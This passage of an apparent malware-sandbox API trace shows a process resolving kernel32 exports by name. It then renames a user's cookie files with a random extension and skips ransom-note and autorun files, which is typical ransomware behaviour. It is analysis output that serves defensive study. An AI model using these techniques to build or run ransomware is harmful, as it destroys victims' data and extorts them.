returned="CreateEventW" [0078.979] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.979] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.979] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.980] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.980] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.980] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.980] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.980] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.980] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.980] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.980] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.980] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.980] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.980] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.980] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.980] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.980] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.980] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.980] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.980] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.980] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.980] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.981] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.981] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.981] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.981] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.981] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.981] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.981] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.981] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.981] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.981] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.981] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.981] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.981] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.981] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.981] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.981] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.981] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.981] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.981] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.982] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.982] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.982] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.982] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.982] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.982] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.982] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.982] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.982] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.982] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.982] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.982] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.982] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.982] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.982] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.982] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.982] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.982] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.982] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.982] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.983] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.983] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.983] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.983] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.983] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.983] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.983] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.983] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.983] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.983] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.983] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.983] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.983] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.983] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.983] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.983] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.983] lstrlenA (lpString="DELETEATOM") returned 10 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.983] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.983] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.983] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.984] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.984] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.984] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.984] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.984] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.984] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.984] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.984] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.984] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.984] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.984] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.984] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.984] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.984] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.984] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.984] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.984] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.984] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.984] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.985] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.985] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.985] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.985] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.985] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.985] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.985] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.985] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.985] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.985] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.985] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.985] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.985] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.985] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.985] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.985] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.985] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.985] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.985] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.986] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.986] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.986] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.986] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.986] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.986] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt") returned 105 [0078.986] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR") returned 112 [0078.986] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0vgwyr"), dwFlags=0x0) returned 1 [0078.987] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.987] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.987] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.987] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1e5e64f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e5e64f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1e5e64f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x19e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", cAlternateFileName="5P94E6~1.TXT")) returned 1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="autorun.inf") returned -1 [0078.988] lstrcmpiW 